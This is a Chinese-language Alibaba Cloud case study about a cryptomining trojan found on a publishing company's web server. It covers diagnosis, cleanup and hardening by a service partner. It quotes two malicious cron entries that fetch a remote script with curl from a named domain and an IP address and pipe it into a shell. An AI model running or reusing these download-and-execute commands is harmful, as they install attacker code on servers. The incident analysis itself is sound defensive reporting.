资源消耗异常，竟是因为比特币挖矿木马

更多深度文章，请关注云计算频道：https://yq.aliyun.com/cloud

上周末起，大规模网络勒索袭击迅速波及全球百余国家和地区，病毒锁死用户数据和电脑文件，要用户支付价值300-

600美元的比特币赎金，成为刷屏级新闻。

比特币是一种网络虚拟货币，主要基于一套密码编码、通过复杂算法产生，任何人都可以下载运行比特币客户端参与制造比特币，这个过程也被形象地称为“挖矿”。而比特币“挖矿木马”，就是由黑客通过木马控制大量肉鸡电脑，为其制造比特币的恶意程序。

警方缴获的比特币“挖矿机”

阿里云服务的客户中，就有中过招的。

北京新华先锋出版科技有限公司是一家专业从事图书策划、代理出版和营销推广的现代化综合性文化产业机构，其旗下子公司北京酷读文化有限公司，负责运营网络文学网站——酷读网，签有国内知名的网络作家，颇具影响力。

在2016年11月份，网站开始出现CPU、内存资源消耗异常，网站响应速度变慢，而用户访问量没有明显变化。技术团队几经排查处理，仍不能消除故障。新华先锋希望找到专业运维人员，一来快速解决问题，恢复网站正常运营，二来长期为网站保驾护航，保障系统稳定，自身集中精力拓展业务。

多方考察，选择了阿里云生态服务合作伙伴博伟来提供服务保障。通过技术诊断，发现网站遭到了“比特币挖矿木马”的入侵。有些木马病毒的高级版本，可以篡改Linux的基础命令，技术人员很难用一般的方法找到木马进程。技术人员需要结合运维经验、网上的资料、用户故障时间点和系统log分析等综合手段才能定位问题。

新华先锋中的木马就是如此。黑客利用系统漏洞，通过web脚本植入该木马，盗用服务器资源进行比特币开采计算。通过下载并分析该木马脚本文件，博伟技术人员发现该木马修改了系统登录认证配置、计划任务、创建采矿进程进行数据接收和处理，同时伪造系统服务，充当守护进程。

l 被篡改的计划任务：

*/10 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?1116 | sh

*/1 * * * * root curl -fs http://101.55.126.66:8990/pm.sh | bash

l 木马文件：

l 木马守护进程：

l 被篡改的SSH配置：

博伟技术人员指导新华先锋完成数据备份，清理了木马进程、守护进程，恢复被篡改的配置文件和计划任务等，在系统恢复正常后进行了一系列加固操作：缓存数据库Redis、IP绑定/密码验证/更换端口、ROOT登录限制/密码修改、Mysql、FTP、SSH端口更换、IPtable访问控制，阿里云ECS实例的安全组IP/端口限制/快照备份。

好在该木马只是利用服务器资源进行计算，并没有盗用或毁坏用户数据，由于及时查杀木马修复漏洞，避免了用户资料泄露和加密敲诈勒索等更严重的后果。

经过此次故障处理及技术人员的日常巡检，现在用户系统运行平稳。博伟也一直在给新华先锋提供7*24小时的运维保障，让新华先锋得以专注自己的业务，在文化出版领域一展拳脚。

想要更多了解生态合作伙伴提供的服务内容，

欢迎进入阿里云官网-支持-区域服务查看！链接：https://www.aliyun.com/support/quyu